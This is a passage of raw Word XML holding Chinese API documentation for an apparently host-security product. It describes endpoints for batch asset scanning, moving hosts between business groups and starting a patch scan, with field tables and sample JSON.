              <w:t>业务组关系名（即从顶层业务组到当前业务组的全路径名）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7AC79B76" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74F13EBC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>owner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6600A443" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41AA82D2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45697C05" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>用户id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="76528667" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56A4014A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>platform</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CD264CC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Byte</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E71DC0C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51138E9A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>平台（１:linux， ２:windows）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="056D0805" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56FB232A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B80E4EF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1ADBAD7F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="789BA099" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="42D953CD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="85" w:name="全部资产批量更新扫描"/>
      <w:bookmarkEnd w:id="82"/>
      <w:bookmarkEnd w:id="84"/>
      <w:r>
        <w:t>全部资产批量更新扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2670AADA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口用于批量请求资产信息扫描，更新数据查询的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B573CB2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC047C9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/assets/{win|linux}/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278EE308"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1339"/>
        <w:gridCol w:w="4281"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="2EDA031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FA86ADF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B18B2FE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D97AD24" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="683A61D7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CB547FE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5197D5C8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48F132E5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>范围类型（0：全部主机 1：agent 2:group）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0299CE68" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22C86F77" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E68F374" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B50B76F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>标识业务组的ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0A61CDA1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61901E48" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70E69A54" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59BB881E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>唯一标识Agent的ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="651A4E16" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D328F77" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/assets/linux/refresh</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "type":1,   // 0 全部主机 1 agent 2 group</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "group":[],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "agentIds":["94e4c7a4f5dec750"]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B68A2B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DF6778" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    id: "some job id"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659123E2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>情景说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1A8546" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>一个账号同时只能一个任务运行，因此调用这个接口前，应该先调用3.1查询状态接口，如果satus非Running，则可以创建任务，如果创建成功，则正常返回， 如果创建失败， 则抛出异常。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70777EAE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果有作业在运行返回</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3343D884"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4CD60ACE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果无在线agent返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A696C48" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorCode": 500,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorMessage": "no online agent", //      错误描述</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "detail":null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496BF221"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7DBC972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D34AC03" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78B7C8A0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D98A4A7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23F15E55" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2FE92B80" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4700914F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BD35631" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="759E957A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FD956F0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>扫描任务ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1F36A013" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="86" w:name="移动主机业务组"/>
      <w:bookmarkEnd w:id="85"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>移动主机业务组</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA7B2D3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口用于批量修改主机的业务组。由于修改业务组信息对服务性能会产生较大的消耗，每30分钟最多修改5000主机的业务组。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75840BC9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C514A1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/assets/host/batch_move_host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B55302"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1220"/>
        <w:gridCol w:w="3266"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="2E482F1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B3E4A7E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FBCAAA7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73EB8B34" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3F45E7A8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22447B06" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>osType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="383068F3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34370EF7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>操作系统（1：linux 2:windows）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3ACFE2F7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77D4EE45" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>groupId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3EC5CFE4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45C53D5D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>标识业务组的ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0967EF35" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5442F0D3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="271DB95A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A5C7E59" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>唯一标识Agent的ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="735073AE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7072D996" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"osTyp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groupId"</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agentIds"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"94e4c7a4f5dec750"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0112479B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3551BF61"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2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1C27BD50" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>情景说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B967992" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>如果单次修改agent数超过5000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C2AD85"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the number of agents is too large, please keep it within 5000"</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45879072" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>如果30分钟内多次修改agent数量总和超过5000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBD4A0A"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the maximum number of executions in 30 minutes is 5000"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"detail"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CE5FAB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="87" w:name="风险发现"/>
      <w:bookmarkEnd w:id="13"/>
      <w:bookmarkEnd w:id="86"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>风险发现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C38C450" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="88" w:name="安全补丁"/>
      <w:r>
        <w:t>安全补丁</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D01CD0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口提供所有的linux和windows补丁的检测和查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EE12D4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="89" w:name="补丁扫描"/>
      <w:r>
        <w:t>补丁扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125542DC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口用于请求主机信息扫描，更新数据查询的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF29E5A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B1D7E2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/vul/patch/{linux|win}/check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B3D63D"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497C54" w14:paraId="0F20BA0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82EB388" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62AA4C49" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
